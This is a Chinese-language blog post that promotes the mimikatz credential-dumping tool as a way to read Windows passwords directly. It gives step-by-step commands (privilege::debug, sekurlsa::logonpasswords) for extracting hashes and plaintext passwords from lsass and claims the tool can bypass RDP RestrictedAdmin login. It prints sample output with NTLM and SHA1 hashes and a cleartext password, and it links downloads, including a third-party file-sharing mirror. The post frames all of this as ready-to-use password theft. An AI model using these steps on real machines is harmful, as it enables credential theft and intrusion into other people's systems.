直接读取Windows密码神器:mimikatz

mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,他可以直接从lsass中获取当前处于Active系统的登录密码

mimikatz的新功能能够通过获取的kerberos登录凭据,绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP)的登陆认证,获取登陆密码更为简单!

Windows密码抓取神器mimikatz 2.1.1使用方法:

第一步:根据你系统选择对应的版本,双击打开

第二步:输入输入 privilege::debug 提升权限

第三步:输入 sekurlsa::logonpasswords 即可获取hash和当前用户的明文密码

mimikatz官方介绍:

mimikatz 2.1.1 vient de sortir en version alpha

binaires : https://github.com/gentilkiwi/mimikatz/releases/latest
sources : https://github.com/gentilkiwi/mimikatz
présentations : http://blog.gentilkiwi.com/presentations
Pour les pressés cherchant des mots de passe…

mimikatz使用详解:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...

mimikatz 2.1.1-20170618 下载:

Latest release:2.1.1-20170618

[fix] mimikatz sekurlsa::* for Windows 2003 older versions.
[new] mimikatz version try to detect Credential Guard and display files version with arg.

下载地址:
http://pan.baidu.com/s/1qXGQmFq
https://github.com/gentilkiwi/mimikatz
https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170618

mimikatz官方网站:
http://blog.gentilkiwi.com/mimikatz

Related Posts